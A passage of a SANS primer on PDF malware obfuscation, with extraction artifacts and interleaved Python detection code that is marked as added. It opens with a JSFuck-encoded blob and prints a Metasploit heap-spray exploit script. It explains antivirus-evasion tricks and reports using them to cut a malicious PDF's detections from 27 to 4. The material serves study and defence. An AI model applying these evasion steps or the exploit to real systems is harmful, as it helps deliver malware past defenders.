[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([+!+[]]+[+!+[]]+[!+[]+!+[]])+(!![]+[])[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[
+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])
[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+
[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+
[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![
]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+
[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]
+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]
]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]
]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[
+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]
]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]
+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[
!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]
+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[]
)[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
]([!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()”
Source: (JSF*ck)
2.4. PDF Filters
PDF files, and the JavaScript they often contain, use a variety of obfuscation
techniques to avoid detection. On April 22nd, 2011, researchers at Avast, a Czech
security vendor, detected a new technique for obfuscation using filters supported
by the format. “The filter, JBIG2Decode, is normally used to decode monochrome
image data but in this case the attackers used it to store javascript code” (Avast).
Refer to the PDF specification documents (found here:
http://www.adobe.com/devnet/pdf/pdf_reference.html) to see that the only filters
intended for stream encoding/decoding are ASCIIHexDecode, ASCII85Decode,
LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, and DCTDecode.
Contrast that list with the complete list of encoders available and you will find three
not included: JBIG2Decode, JPXDecode, and Crypt. Could JPXDecode also be used to
obfuscate malicious code? These are the questions to ask ourselves that lead us to
solving detection problems in creative ways.
There are several filters available to encode streams as noted within the
Adobe PDF specification. These are shown below:
(Source: http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/adobe_supplement_iso32000.pdf)
These!filters!provide!built!in!obfuscation!functionality.!!While!this!is!handy!
when!a!data!file!is!transmitted!over!a!medium!that!requires!such!encoding!or!to!
simply!make!the!file!smaller,!it!is!also!taken!advantage!of!by!malware!authors.!“By!
combining the!filters!in!weird!ways!the!malware!author!hopes!to!bypass!detection!
by!malware!scanners!and!deliver!a!malicious!payload!to!the!victim.”!(Sophos)
For!example,!CCITTFaxDecode has!been!spotted!in!the!wild!being!used!for!
obfuscation (Sophos).!!©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 18
Author!Name,!email@address
Source:!(Sophos)
The!analyst!at!Sophos!decodes!the!first!few!bytes!of!the!file!and!discovers!that!
the!file!is!attempting!to!exploit!the!vulnerability!CVEO2010O2883.!!
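The filter lists above translate directly into a triage check for defenders. The following Python example is added here and is not code from the paper: it lists each object's /Filter chain and flags image codecs on streams that are not image XObjects, unknown filter names, and long cascades. The max_chain threshold and the sample bytes are constructed assumptions.

```python
import re

# The seven filters the paper lists as intended for stream encoding/decoding.
STREAM_FILTERS = {"ASCIIHexDecode", "ASCII85Decode", "LZWDecode", "FlateDecode",
                  "RunLengthDecode", "CCITTFaxDecode", "DCTDecode"}
# The three the paper notes are missing from that list.
OTHER_FILTERS = {"JBIG2Decode", "JPXDecode", "Crypt"}
KNOWN_FILTERS = STREAM_FILTERS | OTHER_FILTERS
# Image codecs: expected on image XObjects, not on script or text streams.
IMAGE_CODECS = {"CCITTFaxDecode", "DCTDecode", "JBIG2Decode", "JPXDecode"}

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)(?:\bstream\b|\bendobj\b)", re.S)
FILTER_RE = re.compile(rb"/Filter\s*(\[[^\]]*\]|/[^\s/<>\[\]()]+)")
NAME_RE = re.compile(rb"/([^\s/<>\[\]()]+)")
IMAGE_RE = re.compile(rb"/Subtype\s*/Image\b")
HEX_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def unescape_names(raw):
    """Undo #xx escapes, which PDF syntax permits inside name tokens."""
    return HEX_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def audit_filters(pdf, max_chain=2):
    """Return [(object number, filter chain, reasons)] for suspicious streams."""
    findings = []
    for m in OBJ_RE.finditer(pdf):
        obj_num, dictionary = int(m.group(1)), unescape_names(m.group(2))
        f = FILTER_RE.search(dictionary)
        if f is None:
            continue
        chain = [n.decode("latin-1") for n in NAME_RE.findall(f.group(1))]
        reasons = []
        unknown = [n for n in chain if n not in KNOWN_FILTERS]
        if unknown:
            reasons.append("unknown filter: " + ", ".join(unknown))
        codecs = [n for n in chain if n in IMAGE_CODECS]
        if codecs and not IMAGE_RE.search(dictionary):
            reasons.append("image codec on non-image stream: " + ", ".join(codecs))
        if len(chain) > max_chain:
            reasons.append("cascade of %d filters" % len(chain))
        if reasons:
            findings.append((obj_num, chain, reasons))
    return findings


# Constructed fragment; stream bodies are placeholders.
SAMPLE = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<< /Length 4 /Filter /FlateDecode >>\nstream\n....\nendstream\nendobj\n"
    b"2 0 obj\n<< /Type /XObject /Subtype /Image /Filter /JBIG2Decode /Length 4 >>\n"
    b"stream\n....\nendstream\nendobj\n"
    b"3 0 obj\n<< /Length 4 /Filter [/ASCIIHexDecode /JBIG2Decode] >>\n"
    b"stream\n....\nendstream\nendobj\n"
    b"4 0 obj\n<< /Length 4 /Filter [/ASCII85Decode /LZWDecode /Fl#61teDecode] >>\n"
    b"stream\n....\nendstream\nendobj\n"
)

if __name__ == "__main__":
    for finding in audit_filters(SAMPLE):
        print(finding)
```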
2.5. Eval() Function
Within javascript, “the eval() function evaluates or executes an argument. If the
argument is an expression, eval() evaluates the expression. If the argument is one or
more JavaScript statements, eval() executes the statements.” (w3schools)
For the purpose of malicious obfuscation, the eval function can mask our code
within an equivalent expression. It is common for antivirus vendors to consider
strings common to malicious code when evaluating code. For example, some
antivirus products are known to trigger on the unescape function. To prevent this
using eval(), one could replace “unescape” with eval('un' + 'es' + 'ca' + 'pe') or
javascript with eval('jav' + 'a' + 'scr' + 'ipt').
2.6. Escape/unescape Function
Escape/unescape is a programmatic function used to convert a string into a
standard format to allow for easier transmission across various mediums and/or
protocols. Some methods of data transmission handle various characters in different
ways. The best way to avoid the misinterpretation of a string is to convert it
(escape) into a common format which can then be converted back (unescaped) by
the recipient.
Consider the following example:
The string, “drop bobby tables; His attendance is no longer desired -- Momma
tables” could be escaped like this:
drop%20bobby%20tables%3B%20His%20attendance%20is%20no%20longer%20desired%20--%20Momma%20tables
or:
%64%72%6f%70%20%62%6f%62%62%79%20%74%61%62%6c%65%73%3b%20%48%69%73%20%61%74%74%65%6e%64%61%6e%63%65%20%69%73%20%6e%6f%20%6c%6f%6e%67%65%72%20%64%65%73%69%72%65%64%20%2d%2d%20%4d%6f%6d%6d%61%20%74%61%62%6c%65%73
or:
%u0064%u0072%u006F%u0070%u0020%u0062%u006F%u0062%u0062%u0079%u0020%u0074%u0061%u0062%u006C%u0065%u0073%u003B%u0020%u0048%u0069%u0073%u0020%u0061%u0074%u0074%u0065%u006E%u0064%u0061%u006E%u0063%u0065%u0020%u0069%u0073%u0020%u006E%u006F%u0020%u006C%u006F%u006E%u0067%u0065%u0072%u0020%u0064%u0065%u0073%u0069%u0072%u0065%u0064%u0020%u002D%u002D%u0020%u004D%u006F%u006D%u006D%u0061%u0020%u0074%u0061%u0062%u006C%u0065%u0073
All of which can be unescaped to achieve the original string.
(Source: Author created)
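For detection, the string splitting from section 2.5 and the encodings shown above can both be undone before signatures are applied. This Python example is added here and is not from the paper; the keyword list and the sample script are constructed for illustration.

```python
import re

_STR = r"'[^'\\]*'" + "|" + r'"[^"\\]*"'   # a simple JS string literal
CONCAT_RE = re.compile(r"(%s)\s*\+\s*(%s)" % (_STR, _STR))
ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def _join(m):
    left, right = m.group(1), m.group(2)
    if left[0] in right[1:-1]:      # merging would unbalance the quotes
        return m.group(0)
    return left[:-1] + right[1:-1] + left[0]


def fold_concatenation(js):
    """Collapse 'un' + 'es' + 'ca' + 'pe' into 'unescape' (literals only)."""
    previous = None
    while previous != js:
        previous, js = js, CONCAT_RE.sub(_join, js)
    return js


def decode_escapes(text):
    """Decode %XX and %uXXXX sequences, as JavaScript unescape() would."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)


def normalize(js):
    """Fold literal concatenation first, then decode the escapes it exposes."""
    return decode_escapes(fold_concatenation(js))


def hidden_keywords(js, keywords=("unescape", "eval", "javascript")):
    """Keywords visible only after normalization, i.e. masked in the raw text."""
    clean = normalize(js)
    return [k for k in keywords if k in clean and k not in js]


# Constructed sample: the eval() split from section 2.5 plus both escape styles.
SAMPLE = ("var f = eval('un' + 'es' + 'ca' + 'pe');\n"
          "var s = f('%64%72%6f%70%20' + \"%u0062%u006F%u0062%u0062%u0079\");")

if __name__ == "__main__":
    print(normalize(SAMPLE))
    print(hidden_keywords(SAMPLE))
```

A keyword that shows up only after normalization is a stronger signal than the keyword alone, since legitimate scripts rarely hide a function name this way.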
2.7. Malformed Syntax
Malformed obfuscation techniques are those that alter the formatting of a file so
that it does not follow the official specifications yet still opens within the user
environment. Adobe Reader, in particular, “tries to load malformed PDF files”
(Porst) even though there may be malformed sections of the file.
For example, the PDF specifications require that PDF documents begin with a
PDF header. A sample PDF header looks like this:
%PDF-1.5
This exact format is not required, though. The only requirements are that
“the header must appear in the first 1024 bytes. It must appear before the Catalog
object. Only “%PDF-” is necessary if the rest is well formed. Random garbage is
ignored.” (Wolf).
This allows for a tremendous amount of flexibility for malware authors to alter a
file in unexpected ways to avoid antivirus detection.
2.8. Encryption
Encryption, of course, is the process of applying a cryptographic algorithm to
data. The PDF format allows encryption of streams or strings. It supports RC4 and
AES (40 to 256 bit).
An example of an encrypted stream within a PDF is shown below:
It’s easy to spot encryption within PDFs because it will always contain the
same type and placement of characters. Also, anytime encryption is in use you will
see /Encrypt somewhere within the file.
Here is an example:
2.9. XDP Format
There may be alternate file types opened by the exploitable application that can
be utilized to confuse the AV detection mechanisms and avoid detection. For
example, xdp, an XML-based PDF format, is one such file type that can drastically
change the number of anti-virus vendors detecting a malicious file.
In February of 2011, Alexander Klink posted on his blog that he had found an
alternate method of representing a PDF file. In his tests, a metasploit-generated PDF
uploaded to Virustotal returned a 13 out of 43 match. An equivalent XDP file
uploaded to Virustotal returned a 0 out of 43 match. He subsequently submitted a
feature request in Metasploit which resulted in pdf2xdp.rb being published shortly
thereafter.
XDP files are nothing more than an XML header, the Base64-encoded PDF, and
an XML footer. Below, we see the structure of an XDP file.
(source: author created)
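The markers described in sections 2.7 to 2.9 can be checked mechanically before a file reaches a scanner. This added Python example (not the paper's code) unwraps an XDP container and reports header, /Encrypt and stream/endstream anomalies. The pdf/document/chunk element layout is my assumption about the XDP packaging, since the paper's structure figure is not reproduced here, and the sample file is constructed, using the header value the paper shows in section 3.

```python
import base64
import binascii
import re

# Published PDF versions; anything else after "%PDF-" is treated as non-standard.
KNOWN_VERSIONS = {b"1.0", b"1.1", b"1.2", b"1.3", b"1.4", b"1.5", b"1.6", b"1.7", b"2.0"}
VERSION_RE = re.compile(rb"%PDF-(\d\.\d)(?![0-9.])")
# Assumed XDP layout: Base64 text inside <pdf><document><chunk>.
XDP_RE = re.compile(rb"<pdf\b[^>]*>.*?<chunk\b[^>]*>(.*?)</chunk\s*>", re.S)
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n")


def unwrap_xdp(data):
    """Return the PDF carried inside an XDP wrapper, or None if there is none."""
    m = XDP_RE.search(data)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1))
    except binascii.Error:
        return b""  # wrapper present but payload undecodable: still flagged


def triage(data):
    """List structural oddities; checks run on the unwrapped PDF."""
    flags = []
    inner = unwrap_xdp(data)
    if inner is not None:
        flags.append("xdp wrapper")
        data = inner
    pos = data.find(b"%PDF-")
    if not 0 <= pos < 1024:
        flags.append("no %PDF- header in first 1024 bytes")
    else:
        if pos > 0:
            flags.append("%d bytes before header" % pos)
        m = VERSION_RE.match(data, pos)
        if m is None or m.group(1) not in KNOWN_VERSIONS:
            header = data[pos:pos + 16].split()[0].decode("latin-1")
            flags.append("non-standard header: " + header)
    if b"/Encrypt" in data:
        flags.append("/Encrypt present")
    missing = len(STREAM_RE.findall(data)) - data.count(b"endstream")
    if missing > 0:
        flags.append("%d stream(s) without endstream" % missing)
    return flags


# Constructed sample: odd header, one missing endstream, /Encrypt in the trailer.
INNER = (b"%PDF-8.31337\n"
         b"1 0 obj\n<< /Length 4 >>\nstream\n....\nendstream\nendobj\n"
         b"2 0 obj\n<< /Length 4 >>\nstream\n....\nendobj\n"
         b"trailer\n<< /Root 3 0 R /Encrypt 4 0 R >>\n%%EOF\n")
SAMPLE_XDP = (b'<?xml version="1.0"?>\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
              b'<pdf xmlns="http://ns.adobe.com/xdp/pdf/"><document><chunk>\n'
              + base64.encodebytes(INNER) +
              b"</chunk></document></pdf>\n</xdp:xdp>\n")

if __name__ == "__main__":
    print(triage(SAMPLE_XDP))
```

Running the scanner on the unwrapped bytes matters more than any single flag: a signature written for the PDF form cannot match Base64 text inside XML.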
2.10. Random Variable Naming
Random naming of any variable string (function, variable, sub, etc.) has no
impact on functionality. Instead, this simple technique is used to make manual
deobfuscation more complex.
As an example, we will examine an obfuscated PDF generated by metasploit.
The first view is the original:
var jOyBxiruYKURcTaNecewpP = unescape("%u0241%u37e1");
var PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE ="";
for (JkLobzZMyBRpyotTXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd=128;JkLobzZMyBRpyotTXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd>=0;--JkLobzZMyBRpyotTXtefwHVpuiMaJWEJDaujUZmyYRDwcJauPCyzWMsryfQWvqaFqieYQocfBXd) PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE += unescape("%u0497%u9648");
CshUqGkgWjTHYjLxkRzgqWuIy = PrjinjDRRWoVymGdMWpEAakDDlzbCLXfmYpCPHMpJGzFAGUuzbfcezUozLGkDBvEeThdFpTdjZeJHbLJJKzXrE + jOyBxiruYKURcTaNecewpP;
hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot = unescape("%u0497%u9648");
qPuNwGeOxRqyheKIJAAgUagvjJdYrZWkUofjidjqbRqwsHDvxXHqtbg = 20;
while (hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.length < QKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt) hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot+=hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot;
HgmEAoYTPKRFNrAnLYefN = hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.substring(0, QKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt);
NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx = hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.substring(0, hAyGKlXasZmWmVTWvEvkTjkwXUyhgzDBeItMLHJGFBSfAggMFKoKbAAtzoheIWKot.length-QKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt);
while(NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx.length+QKHrnJQAYyBXehQPMoFXeahLVKRHurQokQhfMYwLQuIStAJPEVWGhQPVvt < 0x40000) NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx = NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx+NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx+HgmEAoYTPKRFNrAnLYefN;
RIZpfOxrrYDGiUKOuUtdaSFBjQJBxIkaQZDzZvWSDYrVGrJuqUKwDGPDmLIaZEOtdUsWRMvcBViutxIYieMJZjeUttvOCv = new Array();
for (uAVXcNTAVIBlyHTuz=0;uAVXcNTAVIBlyHTuz<1450;uAVXcNTAVIBlyHTuz++) RIZpfOxrrYDGiUKOuUtdaSFBjQJBxIkaQZDzZvWSDYrVGrJuqUKwDGPDmLIaZEOtdUsWRMvcBViutxIYieMJZjeUttvOCv[uAVXcNTAVIBlyHTuz] = NCeBXapaBKQIbLcnsrlGUBsXgrtyUyDCFojhfvJkrmWtphQpllAOawGdHDmREPhIEsiUbqx + CshUqGkgWjTHYjLxkRzgqWuIy;
var BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG = unescape("%u0c0c%u0c0c");
while(BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG.length < 0x4000) BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG+=BTOqMxFjtLLaHeaedLZMvynIgphsNIYEuzSHdTbVZVeMvvtXQNPkLmGibKMCzaEVcUbPuCDXAgoFUG;
Now look at the same script with simple variable names:
var A = unescape("%u0241%u37e1...");
var B ="";
for (F=128;F>=0;--F) B += unescape("%u0497%u9648");
K = B + A;
C = unescape("%u0497%u9648");
qPuNwGeOxRqyheKIJAAgUagvjJdYrZWkUofjidjqbRqwsHDvxXHqtbg = 20;
while (C.length < D) C+=C;
G = C.substring(0, D);
E = C.substring(0, C.length-D);
while(E.length+D < 0x40000) E = E+E+G;
H = new Array();
for (I=0;I<1450;I++) H[I] = E + K;
var J = unescape("%u0c0c%u0c0c");
while(J.length < 0x4000) J+=J;
As you can see, the second example is much easier to understand.
2.11. Environment / User Variables
This technique uses local variables as a component of the javascript. Doing so
allows the malware author to govern the flow of execution based on those variables.
By leveraging this data the script could target, for example, a specific runtime
version or only decrypt if certain values are present.
An example of this technique could use the UserAgent string within a browser
as the key to deobfuscate a malicious javascript. “This technique could be used to
prevent some analysis tools from retrieving the actual malicious code. It would also
require additional effort on the part of security researchers working to reverse
engineer the code.” (Kahu Security)
Source: (Kahu Security)
Another example of this can be seen within javascripts that use the app
object. “That object is created by Acrobat Reader, so if you run the script outside
(for example, with Spidermonkey or another Javascript interpreter) this call will fail
since the object will not exist.” (SANS) This technique is illustrated in the image
below.
Source: (SANS)
3. Practical Application of Obfuscation Methods
Let's see some of these techniques in practice. To begin, Metasploit is used to
create a malicious PDF utilizing the adobe_utilprintf exploit by following the
instructions located at Metasploit Unleashed (
security.com/metasploit-unleashed/Client_Side_Attacks).
This file triggers 27/42 hits when scanned with VirusTotal.
(source: author created)
Metasploit applies obfuscation by default. See below:
(source: author created)
I implement the following obfuscation techniques to lower the number of
antivirus detections:
eval() function
encryption
replace method
malformed
xdp
environment variables
After applying these techniques antivirus is much less effective at detection:
(source: author created)
The 4 detecting AV engines are AntiVir, Avast, GData, Kaspersky.
Let us examine how the file was changed using the above techniques.
